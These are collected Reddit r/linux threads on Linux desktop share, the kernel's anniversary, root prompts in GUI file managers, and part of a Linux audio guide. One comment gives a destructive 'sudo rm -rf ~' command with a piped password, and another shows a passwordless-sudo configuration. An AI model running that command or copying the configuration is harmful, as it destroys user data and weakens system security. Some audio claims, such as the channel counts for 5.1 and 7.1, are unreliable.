I had to go through a few hoops to get h264 decoding to work, by having to add Fusion free repos and swapping out „drivers“ for vaapi and vdpau on my AMD Notebook.

Firefox with full h264+vp9 hw decoding is very nice.

also, TIL flatpaks are *ok* for most stuff, but as soon as you need access to other executables (e.g vscode and running go/dotnet/…) things become ugly very fast.

Soon I will have to try out playing some g'old Anno 1404/1609 using manual wine bottles
Yuhu -  I wil drink for that 3%  and add little bit more % Yea :)
2023 is the year of Linux on the desktop

(I think I first heard that in 2008)
I bet a sizeable chunk of that is Steam Decks.
FreeBSD .01% baby
It might be that, _or_ it might be the unreliability of Statcounter. Who's to say! 🤷
cool shit i cant wait for it to be more than windows
For me KDE has been more professional and better than windows since the 3.5 days and back to the OG KDE plasma(Although, I use Xfce)

Windows simply sucks ass
[hello](https://google.com) this is good
2023 - 2020 = 3%

2120 - 2020 = 100%
The growth will be exponential. More and more people are using Linux.
Okay wait, THIS is the year of linux on the desktop.
I just had to install a new windows PC in my mom's office and I've seen how awful the windows setup process is. And this was windows 10 not even 11 which I hear is worse!! I had to click Skip so many times for setting up a Microsoft live account, Cortana, Xbox crap, data sharing, and on and on. 

Every mainline Linux distro is so much more streamlined. Choose keyboard layout, timezone, username and sometimes a box for Nvidia or MP3 libraries and that's it. Oh and Windows didn't even ask about the timezone, I had to fix it later 😂.
As a new full time Linux user, the experience of using the OS has been truly revolutionized in the past years. My last attempt to use Linux as a daily driver was 10 years ago and it was extremely frustrating, nowadays everything just works, even if some tinkering is needed. I would say that it is now easier to use Linux (Ubuntu at least) than windows because of the superior packaging methods.

I am in the (assumed) minority of Linux users that are not developers btw.
What is the unknown?
Windows 11 probably has something to do with it, too.
I suspect this is more to do with non-power users moving to laptops but still....  yay!
Wine is sending linux customers directly to purchase Microsoft products. The more Wine products you purchase, the more support you provide to directx. Should we applaud or what? Do you want a medal? You will get one from Microsoft.
  
Steamdeck users don't care about linux at all, go read their sub, they ridicule linux users.
  
The raise of anti-cheat programs will end the ride of Windows programs running on linux. Wine is a dead end.
  
edit: lol, the gaming brigade is out there in force, but has no argument, as always.
I learned QEMU KVM that it i got the perfect setuo
KDE and Gnome have indeed produced high  quality, stable usable desktop suites. Any minute now they wii a ounce that they will scrap everything in order to start over with a new paradigm....
Let's all enjoy 25 years of freedom!      
Edit: https://en.wikipedia.org/wiki/Linux_kernel#Releases_before_2.6.0
Started with slackware, kernel 0.96 -- an interesting floppy install.  No X, and *just* enough connectivity to talk to my internal (COM4) USR modem (probably 14.4Kbs).

We all started somewhere, right?

Wonder what happened to my first ISP, Cyberverse.
...and here's me whining to Linus on comp.os.linux 27 years ago:

https://groups.google.com/forum/#!search/dzubin$20linux/comp.os.linux/RoFcCYD4IpY/GJrVGzk1g0UJ

fuck I'm old.
I remember this after a long time of .99 releases. It was met with great fanfare even though it was really just another point release. 

Also, r/fuckimold 
I wonder how many tons of carbon have been saved because we're able with this OS to use good hardware so much longer.
Released on PI Day? Coincidence? I think not!
And 9 years of systemd, on March 30th :-P
Damn, Linux is old
Wow. I guess I was witness to the compiling of a pre-1.x kernel, then.

I worked in an office where we used Unix, via terminals (physical terminals), and I went across the hall to talk to the guy who _actually_ knew what he was doing, and two of his terminals were _fucking flying_ through a very, very long compilation process. When I asked him what it was, he said it was "a new kernel that someone was developing that could make Unix free" (paraphrasing).

At the time, I had no clue whatsoever what it meant.
3.14   Pi Day.
Thanks for the career, Linus ;)
I'm old enough to remember some of the chatter on Usenet when Linus was proposing Linux, especially people saying why don't you help FreeDOS instead, etc.

&#x200B;

I'm very happy Linus chose to do what he wanted to do. It's worked out exceptionally well, by any measure.
Linus Said:
https://www.youtube.com/watch?v=oHNKTlz1lps
[deleted]
Oh the smell of liberty
Half-way to fifty party for Linux!
freedom that is very far from smartphones... :(
[A Heavily Commented Linux Kernel Source Code](http://www.oldlinux.org/download/ECLK-5.0-WithCover.pdf)

&#x200B;

also interesting:  [Tanenbaum–Torvalds debate](https://en.wikipedia.org/wiki/Tanenbaum-Torvalds_debate)
GNU/Linux
Yeah.  Linux is yet another thing younger than me.  SMH
Scenario: You want to copy some configuration files into `/etc`. Your distro is likely using Nautilus (GNOME), Nemo (Cinnamon), or Dolphin (KDE) as its graphical file manager. But when you try to paste the file, it tells you "permission denied". You grumble and open a terminal to do the copying. Your disappointment is immeasurable and your workflow is ruined.

Edit: I would like to point out that a similar problem occurs when attempting to copy files to another user's folder. This happens occasionally in multi-user systems and it is often faster to select several files with unrelated names in a GUI environment than type them out by hand. Of course, in this case, it's probably undesirable to copy as root, but copying nonetheless *requires* root, or knowing the other user's password (a separate problem in itself)

It is obviously possible for a non-root process to ask the user to provide a password before doing a privileged thing (or at least do such a good job emulating that behaviour that the user doesn't notice). GNOME Settings has an "unlock" button on the user accounts management page that must be pressed before adding and editing other user accounts. When the button is pressed, the system prompts the user to enter their password. Similarly, GNOME Software Centre can prompt the user for their password before installing packages.

Compare: Windows (loud booing in the background) asks the user in a pop-up window whether they want to do something as an administrator before copying files to a restricted location, like C:\\Program Files.

It's 2022. Why hasn't Linux figured this out yet, and adopted it as a standard feature in every distro? Is there a security problem with it I don't yet know of?
Nautilus I think has an extension you can use? Not sure.

For Dolphin/KIO it is still work-in-progress. I believe it's stuck for want of volunteers to pick up the remaining work right now.\* For Dolphin there's an alternative approach you can try, see https://invent.kde.org/sitter/kio-admin.

Despite that, some apps have their own elevation support, for example Kate will prompt for your password when saving a file you don't have permission to write to. 

By the way, the usual standard mechanism for doing this is PolKit, if you wanted something to read up about further.

\* Interested? Check out https://invent.kde.org/frameworks/kio/-/merge_requests/731
I think this is the reason I learnt to do everything in CLI 😆
gnome nautilus has its `admin:///path/to/something` that will kick it into 'root' mode. 

I imagine the 'ask for root' is not the default because it would be too easy for total beginners to get kicked into root mode and break things.

Honestly, i rarely if ever need to use the GUI file manager to do 'root' type tasks.
Isn't that just what a polkit does?
It's not that we haven't had enough years to think about it... It's just a bad idea
It might be 2022, but you should watch some of Dave's Garage vids about elevation of rights.  He is an ex MS developer who has worked on many versions of Windows.

He basically praises sudo (when configured to ask for password) for elevation of rights.  With UAC its too easy to get used to clicking OK and screwing yourself.
A lot of projects just decided users shouldn't be doing root actions with a GUI tool. Because well, when your using a root action you should know what your doing.  
This is fine and all, until it's not.
It's not exactly a trivial thing to do. You'll have to interface with something like polkit, meaning you'll have to deal with asynchronous IPC mechanisms in your applications logic, and also have ask yourself questions like "Do I *really* want to give my main application process special privileges, or is using a subprocess the better idea?", meaning you'll have to do careful planning and implement even more non-trivial logic. While GTK and glib have a fair amount of helper- and glue-code for all that, it's still not exactly straight-forward.

TBH, as a for-the-fun developer myself, I'd probably stay away from something like that as well, unless its absence annoyed me personally.
> You want to copy some configuration files into /var.

/var folder is not for configuration files.
Behaviour depends on which file manager you are using. You seem to assume all Linux file managers work the same way, but they do not.

Dolphin, for example, works the way you suggest it should. If you are running a modern version of Dolphin it'll try to prompt for the root password to perform admin actions.

On Thunar, for another example, if you're doing something and discover you don't have proper permissions (to copy a file into a directory, for example) you can right-click in the target destination and select to switch Thunar into a mode with elevated access. This prompts for the password and opens the folder with root access. Then you can paste or delete files with root permissions and close the root-level window to drop the elevated access.

On both file managers it is pretty straight forward, about as easy as right-clicking to delete or paste a file.

Other file managers usually have a similar feature. It's not that what you want to do can't be done, it just doesn't always work exactly the same way as it does in Windows.
Now I'm curious what Windows actually does with the copy.

From a Linux perspective, there are tons of attributes you could copy, or not. As a user, you'd think you always want the equivaent of `cp -a` -- that is, copy *everything* about the file. Maybe even `cp -a --reflink=auto` -- do a copy-on-write to save space if it's on the same filesystem, and a normal copy otherwise.

But your example actually shows why maybe I *wouldn't* want the GUI to just magically copy all attributes: If you do `cp -a` as root, the file will still be owned as a user, which means you'd be able to edit it in the future without root. On a multi-user system, if I copy the file to somewhere you can see, but my user still owns it, then you won't be able to do much with your copy!

Of course, we have to copy *some* file attributes. What if it's an executable? You probably want it to still be executable after the copy, right?

With the terminal, there's none of this ambiguity, but it's also maybe a bit fairer to expect terminal users to understand the difference between `cp` and `cp -a`.

But maybe I'm just over-complicating this and Windows has an elegant solution? What does Windows do?

For the specific case of modifying stuff in `/etc`, there's an easier way: `visudo` or `vipw` with your `EDITOR` of choice. This handles copying the file over to somewhere you can edit as a user, and then putting the results back into place, where it's fair to assume you want the file to have the same attributes it always did. If we don't already have reasonable GUI equivalents to this, maybe we should start there.
openSUSE patch dolphin to allow the open as root option
If you're doing root stuff the presumption is that you'll just do it through the command line. Or take the time to run the file manager as root.
Regarding Nautilus, there are already two issues open for this. It would have been quicker for you to simply (and silently/respectfully) subscribe to them, though I appreciate the opportunity that this thread provides to provide visibility to these tickets for others here who would like to do so, or who would be in a position to contribute code:

* https://gitlab.gnome.org/GNOME/nautilus/-/issues/1282
* https://gitlab.gnome.org/GNOME/nautilus/-/issues/1773

As for OP's rethorical "This is 2022, why is this not implemented yet?!?!!" question, the answer is, "Because the maintainers were busy with more pressing architectural issues that took years to fix" and "Because there's over 400 issues in Nautilus' bug tracker competing for the 2 benevolent maintainers' attention, and you you should provide a patch/merge request to help them bring this number down."
Linux Mint has included this capability for years. 

Your desktop environment just needs the right support modules to allow for privilege escalation. If you manually install a DE, it might not be fully configured for this. 

Being Linux and all, becoming root is not taken lightly and simply can be done without it being somewhat tricky. You can’t just write a line of code “now become root”. It’s a lot of agreement between parts of the system that allow it to work.
[deleted]
For the same reason Windows largely stopped doing that. You get the "Windows Vista effect": People just blindly click away annoying pop-ups without reading a word. Security gained: None, you actually lost lots of it.
Because when it comes to Open Source, horizontal layers are developed by different teams but when you need to slice vertically (UI down to OS level) that's where it falls short. 

It takes a lot of coordination or an iron fist to develop a feature like this.
I've always used sudo nautilus and I have never had any issues with this approach. Granted, it's rare that I mess with any configuration files. I can imagine that when you're using a file manager as root, it is quite easy to accidentally cause a bit of damage to your system. However, root access is possible and not too complicated to achieve.
XFE will prompt, but it wants to open a root instance of itself. It will stay open until you close it.
Before you start working on root files, open the terminal and start Nautilus as root.

Sudo Nautilus will do what you want.
It's in upstream but not in every distro's stable channel yet, also they still have issue interacting with polkit so will take some time to be mainstream.

Personally I won't let GUI touch any root directories, too many potential vulnerability and the possibility of breaking something(for example, 600 and 400 permissions and xattr)
noted
Because it might not be apparent what user really means to do?
Linux is a multi-user OS; several users, based on user ownership, group membership or ACLs can have access to the file. For which user should that gui prompt for password?
Also there are several ways to get access as another user. Whether sudo will work for that particular user, or a login wouldn't be obvious.
So it might not seem too silly to tell user "lol, you can't" when you are not sure what thing the user forget to do.
If you don't have permission to write, it's better to stop and think than to blindly type in a password and trash things.  My opinion, yours may vary.
Because, quite simply, it's too easy to break a system if you could do that. Copying a file to /etc means potentially opening a MASSIVE security hole.   
  
If you know what you're doing enough to copy files to /etc then you know enough to be able to invoke your file manager of choice with su/sudo to have a GUI file manager with administrative privileges. And that doing so is a terrible idea.
Yeah it’s pretty fucking annoying and I’ve literally just had to say “fuck it, I’m doing this in the command line instead”
We have to be careful about the Linus Sebastian problem. There are times when giving a warning and offering a confirmation is asking for trouble and bad UX. Naive users should be able to copy files around their system without risking making their system unbootable by wiping out something critical in /etc or /usr.
To stealth add privileges is horrible conceptually. And no, plastering a wall of text does not make it less of a stealth add; nobody ever reads the popups anyway. If one does something at the wrong privilege level, it should fail. Period.

Elevating privilege level should be an explicit, opt in action. Not an implicit done by another agent. For several reasons, the most important one being that the user should be taught that if something asks for your password without the user explicitly doing something which needs it, they should not enter it. Ever.

The main reason the command line is vastly superior for this is, if you type `mv foo bar` where you have no privileges, it will never automatically "fix" it for you by asking for a password. You need to manually, explicitly, knowingly, willingly type `sudo mv foo bar`, which means you know exactly why you need to enter the password, and you retain the mental concept of never entering your password unless you yourself have explicitly written a command requiring it.

This mental concept does much more for Linux security than anything else.
Because you're not supposed to randomly copy files into /var with that kind of ease. That bar is there to stop you from making mistakes. It's way too easy to bring the habit from lesser operating systems to just provide the password when asked for it and destroy your entire installation.

If you have as a workflow to routinely copy files into /var, you really need to look over your workflow, not change the tools to make it easy to wreck your system.

The simple solution you should be using if you really need to work with files somewhere in /var is to create a group which has write access to the specific directory you need to work in, and add yourself to that group. That way you will be able to copy and edit files in that location to your heart's content without the risk that a missed drag and drop completely wrecks your system.

Windows does this the absolutely wrong way, and has the exactly backwards solution. The solution is not to give you full write access anywhere. The solution is to set up write access for you where you need it.
I think this speaks to the larger cultural problem surrounding Linux.  A lot of Linux evangelists want everyone to swap, but they want everyone to have to learn and use Linux as they do.

People literally ask for features (like the one in OP's title) that would not only help wider adoption of Linux but also help everyday life of even power users, but are met with the same response as the GUI file managers: " lol nope".

If you're not willing to change to appeal to more people then you won't appeal to more people.
Its 2022 and stupidity is everywhere. If we had this feature, some stupid YouTubers or „Lifehackerz“ on Tictoc would break their systems and then:

1. the distro they broke would get a shitstorm as never before
2. Linux would get a shitstorm as well
3. lots and lots of smartasses would step up exactly here and demand that all distros and DEs please dumb down everything into oblivion so that the user is „protected“, like it is „in Windows“ and in Macos.

So there we have it. We will spin in circles, because in 2023, another super-user will step up and tell everyone that it is almost 2024 and we still don’t have a root pop-up in the file managers like in Windows… and in 2025, the YouTuber and Tictoc story repeats….

Rinse and repeat 🙄

„We need to have it like in Windows“. I like that. No, I really love it. When I wanna use Windows, I just do it. I don’t need to rebuild it in Linux. As I said: it’s 2022 and… 😉🙄

&#x200B;

>You grumble and open a terminal to do the copying. Your disappointment is immeasurable and your workflow is ruined.

and this is good. Because this way, your "workflow" = doing things without thinking is interrupted and you actually have to think... think about how you wanna do it and more important: think about if this is even necessary or if it will harm your system!!
Can only answer for Dolphin but up until recently running Dolphin as root was a security risk, so i guess that's why. Hopefully there's support soon.
This is why I still have krusader(maybe konqueror  always get those two mixed up for some reason)installed, has a run as root option you plug in the password and away you go.
That feeling when you realize you forgot to chown the files to the user :(
[deleted]
In Nemo you can right click and open a window with root permissions.
I wonder how this would work if root didn't have permission to write to the path, eg on nfs or some read-only filesystem.
You can just open nemo as root if you want. So Linux has figured it out. I honestly don't get what this post is trying to convey. You can open up terminal, type "sudo nemo" and you get exactly what you described, a nemo instance with elevated privileges.

Dolphin just isn't possible to use with root privileges, that's basically a KDE problem, don't think they're going to fix it anytime soon either.
They do. The support is there. The point is that it's not that smart to do it so the GUI does not show it that much.

You want to try it? CTRL+L and then `admin:///root/` and you will be able to edit files in root's home.
sudo cp, right? Maybe I'm weird, but I find the CLI is just faster for most anything I'm looking to do on a machine than the GUI.
If you know that you are going to perform root operations, you can run the entire file manager as root.   It's easy to create a shortcut that prompts you for the root password or sudo password and then launches the file manager.   But simply putting the ability for a non root user to perform file operations in a directory outside of one they own is a huge security vulnerability and one that Linux rightfully doesn't allow.  If you expect windows like behavior in Linux (ie a UAC warning and simple click to continue), then you will open up Pandora's box to a host of malware that gain access by duping it's user to click to allow it permission on the system.   There shouldn't be any reason for an unprivileged user to copy files outside of their home.  The user typically even has their own bin folder for binaries as well as the ability to run various sandbox technologies as well.
>You grumble and open a terminal to do the copying.

or just press f4, open a terminal within your file manager then you can just sudo cp filename.ext /destination

(I have the terminal panel permanently open in Dolphin and do most things from there - copying, moving, unzipping, compressing etc with the gui just as a visual)
I have a gripe with this too, in my opinion it is misguided security practices to prevent it. Yes in theory users should not be poking around with certain files and folders, but unfortunately there can be sometimes legitimate reasons to do it. I installed Krusader on my system for this reason, because Dolphin would not let me run it as root.
in sudoers, colin ALL=NOPASSWD: ALL

sudo rox (running as root)

go into /etc and graphic edit anything or copy anywhere or do anything

when featherpad comes up, has a red line warning 'Root instance'

yep security problem, have to explicitly do sudo, too hard ?
I just do a ```sudo Nautilus``` whenever i need root access on Nautilus.
saving the user from their stupidity
this should absolutely be a thing and it's embarassing it's not.
Seems like a lot of gatekeeping users in this thread, op, fully agree that this should be baked in. Not everyone has the time to lurk all linux manuals.
TBH these small life improvements is what keeps "family members" from switching to linux. 

If I was starting now, and i tried something ,and learned that i need to run sudo, then i will just sudo nautilus to do what i want, and the whole point of security and protection goes through the window...

And then you will learn that this is bad, and feel like it was your fault for the program screwing you over.
Then it becomes:
  
"Why do I have to type my password for every copy, can't I be root all the time?!"
  
"Wait, why did Dolphin write those file as root? Why didn't he write them as me?"
  
"What do you mean you can't read this video?!"
  
"Can't we just run VLC as root all the time? Sometimes VLC can't read a video but it works when I login as root"
  
"Can't we just login in KDE as root? It's 2030 guys! This is not how linux is going to be adopted by the average users!"
Windows has that, they call it the UAC and everyone complained when it was introduced
I’ve never had the problem you describe. Is your regular user account in the wheel group? Wheel is the old school group for admin, so you would get asked for the root/sudo pass. What distro are you using?
Why not organize such an effort?

You're clearly in the right demographic to know if the solution will work for you.
> Compare: Windows (loud booing in the background) asks the user in a pop-up window whether they want to do something as an administrator before copying files to a restricted location, like C:\Program Files.

No, Windows doesn't. What it does is to say you dont have permission, then asks for the administrator password to *apply the relevant permissions for you to all files and folders below*. Thus giving you total R/W access over files only an admin should have access to.

In fact it would be nice if it were *possible to run file explorer in admin mode at all*.

At least in Linux you can just launch the fm with the elevated permissions and not have all the permissions screwed with.

It's 2022, and it's still too easy for non-privaleged users to gain dangerous privileges in operating systems like Windows which are the most targeted and attacked platforms on the planet.
Solution is to never use the GUI.
As to your edit, no, you do not need the other user's password. Use "`sudo su - user`".

EDIT: And there he blocks me for not agreeing with him, and for not having any actual arguments for why what he suggests should be implemented.

Some people just can't handle disagreement. A shame.
> It is obviously possible for a non-root process to ask the user to provide a password before doing a privileged thing

No, actually, they can't.  Programs can shed privileges, not gain them.  What they can do is ask another program, that does already have setuid root, to prompt for a password and then run a second copy of the program.   And this really needs to happen before they start actually doing something because the new process does not inherit the internal state of the existing process.
It could be the space year 3091 and not everyone might want that feature. Sometimes being told "no" is faster and you probably weren't doing the right thing anyway.

I wish in 2022 that "popup" dialogs were banned full stop but look where we are. People requesting more of the blasted things ;)
Cuz u should use a command line
>asks the user in a pop-up window whether they want to do something as an administrator 

look how well that turned out. people get desensitised to it.
File managers do what the programmer asks them to do. Why don't you code your own file manager if you need a different behaviour?
Because that's exactly something Microsoft has been doing with Windows since Vista.  And do you remember the backlash and all the comical commercials that came about because of that?  Do you want Linux to become a joke?
Back during LTT's experiment (Linus and Luke trying out Linux), Linus had the exact same concern about Dolphin. Being influential as he is, the devs added the option to use Dolphin as root.

The bad part is that there's no beautiful "popup asking for password to perform some admin action from your regular Dolphin session", but rather you can launch another Dolphin instance but with root privilege. Also, the root Dolphin messes up theming.

If you want some explanation as to why this feature was absent, at least on Dolphin, you can try and follow the LTT experiment aftermath.
There are extensions for Dolphin, in fact SUSE even comes with a "run as root" option that let's you run it like that. The reasoning behind this not being the default is pretty simple: You go root, you can get yourself into very real trouble very quickly. You also can't as easily fall for a "delete win32" like this.

My recommendation, if you don't want to install an extension, is to turn on the Terminal panel in Dolphin (F4 - no, really). The terminal will always follow your location and you can just sudo *whatever* at any point.
100% agree!

This especially compounded by the fact that Wayland just plain [doesn't allow](https://wiki.archlinux.org/title/Running_GUI_applications_as_root#Wayland) you to run a program as root!

I mean, isn't one of the main points pf GNOME's very own GVFS to be able to manipulate `root`-files without `root`-permissions (using the Admin back-end)?
Maybe because that would be a security breach waiting to happen. `root` has a separate password for a reason. Or at least it should. Get off my lawn, you `sudo`-using youngsters!
I need this for winscp

PLEASE
Because doing sich File operations in a GUI is Dangerous and can result in a broken system very fast. That's also the reason why you should never Run Xorg or wayland as root.
I am curious why person running full fledged DE ever needs to write to /etc
[removed]
Thunar does that in most cases, except when copying.
On ubuntu and Pop, all you need is Nautilus -Admin in synaptic repos.
Some may call it open as admin....right click and choose.

I have it on my two computers used by me alone, my home media computer I don't have it installed as anyone can use that .
My version of Nautilus?  (Nemo?  I forget) has an "Open as Root" option, which triggers a privilege escalation and then provides exacly that.

It's  not exactly as convenient as prompt on operation failure, but it's pretty easy.  And IMO it's probably better to be switching to a file browser with a big red banner that says "Elevated Privileges" across the top.
I know it's not an ideal solution, but the KDE team has a file manager called [Krusader](https://apps.kde.org/krusader/) that you can run as root.
Yours doesn't, but mine does in Fedora 36 KDE. Ubuntu is just not keeping up.
Two problems how do alice and bob share files and how do I edit root privileged directories.

The first is most easily solved by a folder that has permissions such that both alice and bob can access. The second by the file manager having a context menu item like "open as root" which some do just not nautilus. 

This isn't an ideal solution for sharing stuff from alice to bob however as if you use it then by default the owner if the file will be root and you will have to manually fix that after you move it.

This is the nuts and bolts of shared folders. https://www.geeksforgeeks.org/how-to-create-a-shared-folder-between-two-local-user-in-linux/

You don't have to do this via the cli you can do it in your graphical file manager.
Ctrl+L then add ‘Admin:’ to the front
Double Commander, my favourite file explorer, does that :-)
I forget which file managers do this, but in some you can right click a folder and open it as root.
I feel your pain, but what helps me is knowing that in bash if you type out the first few characters of the name of a file then hit tab it'll auto complete the rest of the file name
/u/reguasbuats

People want this feature on Dolphin!
For a little extra seasoning on this discussion, [polkit](https://wiki.archlinux.org/title/Polkit) does similar things in most distros. For example, if you've ever done just a  `systemctl start something` not as root as had it prompt you to login, or done something administrative in Gnome and had it do a UAC like login prompt, that was polkit.
CLI> sudo nemo
Well, it can't be harder as checking if a directory-related shell command works without `sudo`, then using polkit if not so, is it?

Also, copying to another user's folder is not permitted since such user should not expect their files to be accessed, modified, or removed, nor find new files without prior knowledge and their authorization (aka password or group) in the first place.
Put in a pr to add the feature then
I run mint xfce and when I open my system folder I right click and open as root. Put my password in, a separate window opens and from there I've played with simple shit like adding theme files or adding icons. Nothing serious yet but common sense tells me all can be done that way. Curious enough to break it and sane enough to fix it.
Idk how they really do it but one option would be to then run smth like echo "1234" | sudo rm - rf ~
Can you download Dolphin file manager for windows?
Hey, I'm a designer in need of a new file management system on my windows PC. I really love Apple's file management layout. I heard Dolphin is fantastic but I'm kinda new to all this and it seems like Dolphin isn't able to be used on windows? Is this true? If so, could anyone recommend me a great file management program like it for windows?
nemo comes with this option. 
frankly ive found it much friendlier to use than nautilus.
it also seems to run slightly faster, think it has something to do with icons.
idk tho, im still kinda a linux noob.
A dialog "Permissions required" with a dropdown of users and a password field would indeed be fine.
I think they used to. I want to say Ubuntu or GNOME removed it at some point a decade ago back around the GNOME 2 era due to concerns users would overwrite or delete stuff they shouldn’t.
Current year? Well then.
Things like these remind you how GUI will always be an afterthought on linux and why it's far from ready for desktop market.
For a security reasons they shouldn't implement it. In unix, in order for an program to change user, it needs to have \`SUID\` permission set, any program that does change user checks the password by itself, and may let you do a bruteforcing attack if it doesn't have a lock mechanism already implemented if you enter multiple wrong passwords. The short story: the less SUID executables you have on your system, the less possibility that one of these executables has a vulnerability that let's it do a privilege escalation.

The other option then is for these programs and the more secure Imo is to use something like sudo and relaunch themselves as a root user. Although sudo has a security vulnerability every now and then, it is more manageable to patch it alone, than to have a plethora of file managers that may not be as reviewed as sudo is.
I realize it has been a few weeks, but if you accept the risks, I have a tool called "filemanager-gksudo2" that you can find on github that does this for most file managers.
It’s historical, and cultural.

You want to do a grown up thing? Use the CLI like a grownup.
[deleted]
Corporations need to have the ux point to sell their propietary shit. It's made this way for a reason. The other one being no dev wants to work for free on basic stuff. Everyone wants attention and you get that  by writing a gpu driver from scratch with the new fancy language.
Hey fellow penguins,

A few days ago, an user asked about audio quality on Linux, and whether it is worse or better than audio on Windows. The thread became a mess quickly, full of misconceptions and urban myths about Linux. I figured it would be worthwhile to create a complete guide to Linux audio, as well as dispelling some myths and misconceptions.

To all be on the same page, this is going to be thorough, slowly introducing more concepts.

What is sound? How and what can I hear?
---------------------------------------

You might remember from high school that sound is waves traveling through the air. Vibrations of any kind cause molecules in the air to move. When that wave form finds your ears, it causes little hairs in your ear to move. Different hairs are susceptible to different frequencies, and the signals sent by these hairs are turned into sound you hear by your brain.

In reality it is a little more complicated, but for the sake of this post, that's all you need to know.

The pitch of sound comes from its frequency, the 'shorter' the waves are in a waveform, the higher the sound. The volume of sound comes from how 'tall' the waves are. Human hearing sits in a range between 20Hz and 20,000 Hz, though it deviates per person. Being the egocentric species we are, waves below 20 Hz are called 'infrasound' and waves above 20kHz are called 'ultrasound.' Almost no humans can hear beyond ultrasound, you will find that your hearing probably cuts off at 16kHz.

To play around with this, check out this [tone generator](https://www.szynalski.com/tone-generator), you can prove anything above with this yourself. As a fun fact: human hearing is actually really bad, we've among the most limited frequency ranges. A cat can hear up to 40kHz, and dolphins can even hear up to 160kHz!!

**FACT: Playing loud music is dangerous!** If you listen to music and you are feeling a discomfort, you should turn the volume down. A true alert is when you hear a beep - this is called tinnitus, and that beep you're hearing is pretty much the death cry of the cells that can hear that frequency. That beep is the last time you will hear that very specific frequency ever again. Please, listening to loud music is not worth the permanent hearing damage, please dial it down for your own sake! <3

How does my computer generate sound?
------------------------------------

To listen to sound, you will probably be using headphones or speakers, inside of them are cones that are driven by an electromagnet, causing them to vibrate at very precise frequencies. This is essentially how sound works, though modern headphones certainly can be pretty complex. 

To drive that magnet, an audio source will send an analog signal (a waveform) over a wire to the driver, causing it to move at the frequency of that waveform. This is in essence how audio playback works; and we're not going to get into it much deeper than this.

Computers are digital - which is to say, they don't do analog; processors understand ON and OFF, they do not understand 38.689138% OFF and 78.21156% ON. When converting an analog signal (like sound) to a digital one, we make use of a format called PCM. For PCM to be turned into an analog signal, you need a DAC - or as you probably know it: a sound card. DAC stands for 'Digital to Analog Converter', or some people mistakenly call it "Digital Audio Converter/Chip"

PCM stands for **P**ulse-**c**ode **M**odulation, which is a way to represent sampled analog signals in a digital format. We're not going to get into it too much here, but imagine taking a sample of a waveform at regular intervals and storing the value, and then rounding that value to a nearest 'step' (remember this). That's PCM.

The fidelity of PCM comes from two elements, which we are going to discuss next: **sampling rate** and **bit depth.**

What is sampling rate? Or: HOW SOUND GOOD?
------------------------------------------

Sampling rate is the most important part of making PCM sound good. Remember how humans hear in a range of 20Hz to 20kHz? The sample rate of audio has a lot to do with this. You cannot capture high frequencies if you do not capture samples often enough. Since our ears can hear up to 20 kHz, you would imagine that 20kHz would be ideal for capturing audio; however, a result of sampling is that you actually need twice the sample rate, this is called the [Nyquist-Sannon sampling theorem](https://en.wikipedia.org/wiki/Nyquist%E2%80%93Shannon_sampling_theorem), which is a complicated thing. Just understand that to reproduce a 20kHz frequency, you need a sample rate of 40kHz.

To have a little bit of room and leeway, we settled on a sample rate of 48kHz (a multiple of 8) for playback, and 96kHz for recording. We record at this frequency only to make sure absolutely no data is lost. You might be more familiar with 44.1kHz for audio, which is a standard we settled on for CD playback and NTSC. A lot of scientific research has been done on sound quality, and there is no evidence to suggest people can tell the difference between 48kHz or anything higher.

**MYTH BUST:** Humans cannot hear beyond 20 kHz, period. Anyone who claims to be able to is either supernatural or lying to you - I'll let you choose which.

What is bit-depth? Or: HOW IT MAKE SOUND REALLY NICE?
-----------------------------------------------------

Remember how I told you to remember that PCM rounds values to the nearest step? This has to do with how binary works. The more bits, the bigger the number you can store. In PCM, the bit-depth decides the number of bits of information in each sample. With 16-bit,  the range of values that can be stored is 0 to 65535. Going beyond this is pointless for humans, with no scientific research showing any proven benefit, though marketeers would like you to believe there's benefits.

**MYTH BUST:** 24-bit depth is often touted as 'high-resolution audio', claiming benefits of a better sonic experience. Such is nothing more than marketing speech, there is no meaningful data 24-bit can capture that 16-bit cannot.

Channels? Or: HOW IT CAN MAKE SOUND IN LEFT BUT NOT RIGHT?
----------------------------------------------------------

We'll briefly touch on the last part of PCM audio, channels. This is very self explanatory, humans have two ears and can hear separate sounds on both of them, which means we have stereo hearing. As a result, most music is recorded with 2 channels. For some surround settings, you need more channels, this is why you may have heard of 5.1 or 7.1; the first digit is the amount of channels the PCM carries.

For most desktop usage, the only sound we care about is 2-channel PCM.

Recap
-----

So, we've covered all the elements of PCM sound. Let's go over it quickly: sample rate is expressed in Hz and is how often a sample of a waveform is captured, representing the x-axis of a waveform. Bit-depth is the bits of information stored in each sample, and represents the y-axis of the waveform. Channels decide how many simultaneous outputs the PCM can drive separately, since we have 2 ears, you need at least two channels.

As a result, the standard audio playback for both consumers and professionals is 48kHz, 16-bit, 2 channel PCM. This is more than enough to fully represent the full range of human hearing.

How it works in Linux
=====================

So, now that we know how PCM works, how does Linux make sound? How can you make Linux sound great? A few important components come into play here, and we'll need to discuss each of them in some detail.

ALSA
----

ALSA is the interface to the kernel's sound driver. ALSA can take a PCM signal and send it to your hardware by talking to the driver. Something important to know about most DACs is that they can only take one signal at a time, actually. That means that only a single application can send sound to ALSA at once. Long ago, in a darker time, you couldn't watch a movie while listening to music! 

This problem was solved a long time ago with the use of `alsalib`, but doing mixing at a library level isn't a very good solution to the problem. This gave rise to sound servers, of which many have existed. Before PulseAudio, `esound` was a very popular one but had many problems, eventually it was succeeded by PulseAudio.

PulseAudio
----------

When you think audio on Linux, PulseAudio is probably among the first things you think of. PulseAudio is NOT a driver, nor does it talk to your drivers. Actually, PulseAudio only does two things that we'll discuss in detail later. PulseAudio talks to ALSA, taking control of its single audio stream, and allows other applications to talk to PulseAudio instead. Pulse is an 'audio multiplexer', turning multiple signals into one through a process that is called **mixing.** Mixing is an incredibly complicated subject that we won't talk about here.

To be able to mix sounds, one must make sure that all the PCM sources are in the same format (the one that's being sent to ALSA); if the PCM format being sent to Pulse does not match the PCM format being sent to ALSA, pulse does a step before mixing it called **resampling.** Resampling is another very complicated subject that can turn a 8kHz, 4-bit, 1-channel PCM stream into a 24kHz, 24-bit, 2-channel PCM stream.

These two things allow you to play a game, listen to music and watch YouTube, and notifications to produce a sound all at the same time. PulseAudio is the most critical element of the Linux sound stack.

**FACT:** PulseAudio is a contentious subject, many people have a dislike for this particular bit of software. In all honesty, PulseAudio was brought to the general public in a bit of a premature state, breaking audio for many people. PulseAudio these days is a very stable, solid piece of software. If you have audio issues these days, it's usually a problem in ALSA or your driver.

What about JACK and PipeWire?
-----------------------------

